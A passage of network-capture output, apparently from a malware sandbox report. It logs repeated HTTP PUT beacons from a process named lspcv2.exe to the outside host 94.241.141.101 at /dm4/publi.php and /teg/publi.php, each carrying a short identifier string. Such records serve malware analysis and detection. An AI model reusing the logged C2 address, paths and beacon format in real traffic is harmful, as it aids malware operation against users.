Nov 14, 2024 15:01:28.603025913 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:29.486960888 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:29 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.4 | 50147 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:28.705671072 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
Nov 14, 2024 15:01:28.710704088 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:29.581828117 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:29 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.4 | 50150 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:29.214881897 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
Nov 14, 2024 15:01:29.219918966 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:30.134290934 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:29 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.4 | 50154 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:29.615062952 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
Nov 14, 2024 15:01:29.620707989 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:30.491475105 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:30 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.4 | 50155 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:29.710455894 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
Nov 14, 2024 15:01:29.715941906 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:30.608570099 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:30 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.4 | 50161 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:30.246243000 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
Nov 14, 2024 15:01:30.251149893 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:31.256499052 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:30 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
116 | 192.168.2.4 | 50162 | 94.241.141.101 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:30.616844893 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
Nov 14, 2024 15:01:30.621623993 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:31.492726088 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:31 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.4 | 50164 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:30.740637064 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
Nov 14, 2024 15:01:30.748332977 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:31.633388996 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:31 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.4 | 50171 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:31.612411976 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
Nov 14, 2024 15:01:31.617727041 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:32.543267965 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:32 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.4 | 50172 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:31.753701925 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
Nov 14, 2024 15:01:31.758687973 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:32.689899921 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:32 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  120 | 192.168.2.4 | 50179 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:32.606503010 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:32.611509085 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:33.493434906 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:33 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  121 | 192.168.2.4 | 50180 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:32.658951044 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:32.664319038 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:33.546020031 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:33 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  122 | 192.168.2.4 | 50181 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:32.814412117 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:32.822105885 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:33.725588083 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:33 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  123 | 192.168.2.4 | 50187 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:33.621603966 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:33.627060890 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:34.552920103 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:34 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  124 | 192.168.2.4 | 50188 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:33.676103115 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:33.681041002 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:34.545564890 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:34 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  125 | 192.168.2.4 | 50190 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:33.843502045 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:33.848422050 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:34.739825964 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:34 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  126 | 192.168.2.4 | 50191 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:34.668690920 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:34.680645943 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:35.600949049 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:35 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  127 | 192.168.2.4 | 50192 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:34.680649042 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:34.685610056 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:35.578666925 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:35 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  128 | 192.168.2.4 | 50193 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:34.859108925 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:34.864061117 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:35.759759903 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:35 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  129 | 192.168.2.4 | 50194 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:35.703675032 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:35.709029913 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:36.591629982 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:36 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  130 | 192.168.2.4 | 50195 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:35.714353085 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:35.719783068 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:36.596904039 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:36 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  131 | 192.168.2.4 | 50196 | 94.241.141.101 | 80 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:35.876508951 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:35.881828070 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:36.749599934 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:36 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  132 | 192.168.2.4 | 50197 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:36.716801882 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:36.722615957 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:37.596760035 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:37 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  133 | 192.168.2.4 | 50198 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:36.720300913 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:36.725596905 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:37.607450008 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:37 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  134 | 192.168.2.4 | 50199 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Nov 14, 2024 15:01:36.880135059 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:36.884994984 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:37.787271023 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:37 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  135 | 192.168.2.4 | 50200 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
